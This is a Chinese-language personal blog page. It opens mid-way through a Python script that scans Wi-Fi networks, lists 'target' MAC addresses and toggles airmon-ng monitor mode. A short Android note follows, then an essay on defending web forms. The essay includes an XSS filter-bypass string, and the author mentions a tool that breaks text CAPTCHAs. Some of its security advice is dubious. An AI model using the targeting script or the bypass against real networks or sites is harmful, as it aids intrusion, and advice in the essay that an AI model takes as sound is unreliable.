			for x in range(0,len(k)):
				if (k[x].signal>=target_singal_limit and (target_ssid==k[x].ssid or target_ssid=="")):
					target_mac.append(str(k[x].address))
					print("Found MAC:" + wcolors.RED + str(k[x].address) + wcolors.END + "\tSIGNAL:" + wcolors.RED + str(k[x].signal) + wcolors.END + "\tSSID:" + wcolors.RED + k[x].ssid + wcolors.END)
				else:
					print("Found MAC:" + wcolors.YELLOW + str(k[x].address) + wcolors.END + "\tSIGNAL:" + wcolors.YELLOW + str(k[x].signal) + wcolors.END + "\tSSID:" + wcolors.YELLOW + k[x].ssid + wcolors.END)
			target = open('./black_list.txt', 'w')
			for x in range(0,len(target_mac)):
				target.write(target_mac[x] + "\n")
			target.close()
		except:
			print("")
		time.sleep(time_X)
except:
	os.system("airmon-ng stop wlan1mon")
	time.sleep(2)
	print("wlan1mon DOWN..")
input("\n\n請輸入任意鍵結束...");


This entry was posted in General, Experience, Functions, Note, Python, Tools, Wi-Fi By Weil Jimmer.

Android 當鍵盤出現鎖定物件移動

No Comments
-
更新於 2018-03-28 12:24:01

當我很困擾於每次鍵盤都會Resize我的View很討厭,去搜尋又找不到方法,結果,網路上搜尋結果是:物件沒有調整大小,而是「移動」了。使用下列代碼插入目標物件XML即可。

android:isScrollContainer="false"

僅此作為筆記。


This entry was posted in Android, General, Experience, Functions, Java, XML By Weil Jimmer.

淺談 - 資安 - 表單防禦

No Comments
-
更新於 2017-03-04 14:51:53

閒閒沒事在Google搜尋我自己部落相關的關鍵字,想看看能見度多高還有會顯示什麼東西,我搜尋表單攻擊,卻看到別人部落上寫了一篇表單安全性的文章,突然有感而發,我也來發表這類的東西。

--只是個人淺見,若有高手歡迎指正。--

首先撰寫表單堅持一些要點就不容易被攻擊。

一、過濾所有Request變數。

最基本的防禦XSS,那些JavaScript寫成的惡意程式碼,還有跨站框架……等等攻擊。最主要只要擋掉「HTML」標籤就可以了,問題是,萬一我要開放HTML給使用者使用,這下才是真的麻煩,如果真如此就只好開放BBcode囉。千萬不要直接允許用戶輸入HTML,即使是限制也是有問題的。

攻擊者可以利用事件 onClick、onError、onLoad 之類的方式觸發XSS攻擊。危險。

Replace掉所有「<」、「>」、單雙引號,就安全了嗎?Maybe,Maybe Not。

有些人就直接 Replace 掉 <script ,感覺上很對,實際上有很大的漏洞。

如果我寫 「<script<scr<scriptipt>」被過濾掉一次之後會變為「<script>」,像這種清除字串,最好寫一個 while true ,刪乾淨,搜尋到就刪,直到沒搜尋到為止。(萬不得已才這樣做)

個人建議全部改用 HTML 編碼,全面HTML編碼(HTML編碼就是 &#Unicode; 的形式的字串),若有引數是在資料庫語句的話就請不要用 XXX=XXX 的形式(數字型態),全部改用 XXX="XXX" 之類的,一定要有引號框住。並且過濾掉所有單雙引號<>以及反斜線。

至於傳進變數的方式,建議通通改成 POST ,不要使用 GET ,除非分頁設計還是什麼的,不然絕對沒必要使用 GET ,很危險。這有牽扯到某些伺服器的有啟用magic quotes,會自動脫逸引號字元,所以用POST會較為安全一些。而且POST,攻擊者比較不好攻擊。

還有COOKIE、Header 傳進來的 也建議 過濾掉。

二、不使用cookie、鎖定session以及IP。

又要再次重申 cookie 的危險程度,我幾乎寫程式只用 session 完全不使用 cookie,我知道session 有所謂的 SESSION_id 是透過 cookie 所存,所以攻擊者只要獲取其他人的 session ID,即可使用 cookie 欺騙 就這樣簡單的取得他人的帳號權限。

網路上有一堆防禦方法是 透過IP UserAgent 算出來的 MD5 作為安全碼,只要進來的安全碼和之前不同就登出用戶,是一個很棒的方式,不過很麻煩。這對登入表單有一些效果,如果是留言表單,我故意關閉cookie,讓server的session id 跳錯,這樣就很有可能可以直接不經過驗證碼就可以留言(前提是對方沒有檢查session驗證碼的值是否為空)。

我的作法是強制鎖定 session ID 為 IP 的 md5 值,這樣也許會有點不方便,不過我覺得這樣反而好一點,不需要擔心什麼 session 挾持,或是 對方換一個新的 ID 進來,明明被 ban 15分鐘又可以繼續留言。

三、防止表單偽造、防止惡意灌水

什麼是表單偽造,表單傳入的值可以直接當成 name=value&name2=value2 ... 無限延伸,檢查也是檢查值,很多後端程式 根本不管從哪來 Request 進來的,這給攻擊者很大的方便,只要複製一分一模一樣的表單,就可以無限偽造一堆請求過去。

有些會透過 Header 的 Referer 來檢查 轉介站,不過 Header 也是可以偽造的。

所以,最好是在 表單一訪問的情況 就立刻生成一個 Key ,當值傳到後端處理的時候,就檢查那個 Key 有沒有相同,不同就是表單偽造,然後每次通過驗證就銷毀 Key重新生成一個新的,而攻擊者為了取得Key,必須一直不斷的向 「原始」 表單請求 ,獲取裡面的 Key 才可以發送資料。

這原理跟驗證碼有點相似,現在很多網站都有圖形驗證碼了。不過一樣也有一些是沒有驗證碼的,驗證碼是一定要有的!不然會被惡意攻擊,

而那些使用 「文字」驗證碼的人,自以為很安全,其實很危險。我近期開發出來的表單攻擊程式就可以破解文字驗證碼!即使是要經過數學運算的也是一樣可以破解。

意味著我可以提交完就訪問原始網站,分析驗證碼,又提交,又訪問原始網站,分析驗證碼,又提交……

唯有圖形驗證碼才可以防禦此類攻擊。文字驗證碼根本不可靠。

By Weil Jimmer


This entry was posted in General, Experience, Functions, HTML, JS, PHP By Weil Jimmer.

 1 2 /2 頁)下一頁

Visitor Count

pop
nonenonenone

Note

台灣假新聞橫行,沒一家霉體能信的,網軍側翼到處洗風向,堪憂。

毋忘初心,
絕不利慾薰心。

支持網路中立性.
Support Net Neutrality.

飽暖思淫欲,
饑寒起盜心。

支持臺灣實施無條件基本收入

歡迎前來本站。

Words Quiz


Search

Music

Blogging Journey

4465days

since our first blog post.

The strong do what they can and the weak suffer what they must.

Privacy is your right and ability to be yourself and express yourself without the fear that someone is looking over your shoulder and that you might be punished for being yourself, whatever that may be.

It is quality rather than quantity that matters.

I WANT Internet Freedom.

Reality made most of people lost their childishness.

Justice,Freedom,Knowledge.

Without music life would be a mistake.

Support/Donate

This site also need a little money to maintain operations, not entirely without any cost in the Internet. Your donations will be the best support and power of the site.
MethodBitcoin Address
bitcoin1gtuwCjjVVrNUHPGvW6nsuWGxSwygUv4x
buymeacoffee
Register in linode via invitation link and stay active for three months.Linode

Support The Zeitgeist Movement

The Zeitgeist Movement

The Lie We Live

The Lie We Live

The Questions We Never Ask

The Questions We Never Ask

Man

Man

THE EMPLOYMENT

Man

In The Fall

In The Fall

Facebook is EATING the Internet

Facebook

Categories

Android (7)

Announcement (4)

Arduino (2)

Bash (2)

C (3)

C# (5)

C++ (1)

Experience (52)

Flash (2)

Free (13)

Functions (36)

Games (13)

General (60)

Git (2)

HTML (7)

Java (13)

JS (7)

Mood (24)

NAS (2)

Note (32)

Office (1)

OpenWrt (6)

PHP (9)

Privacy (4)

Product (12)

Python (4)

Software (11)

The Internet (25)

Tools (16)

VB.NET (8)

WebHosting (7)

Wi-Fi (5)

XML (4)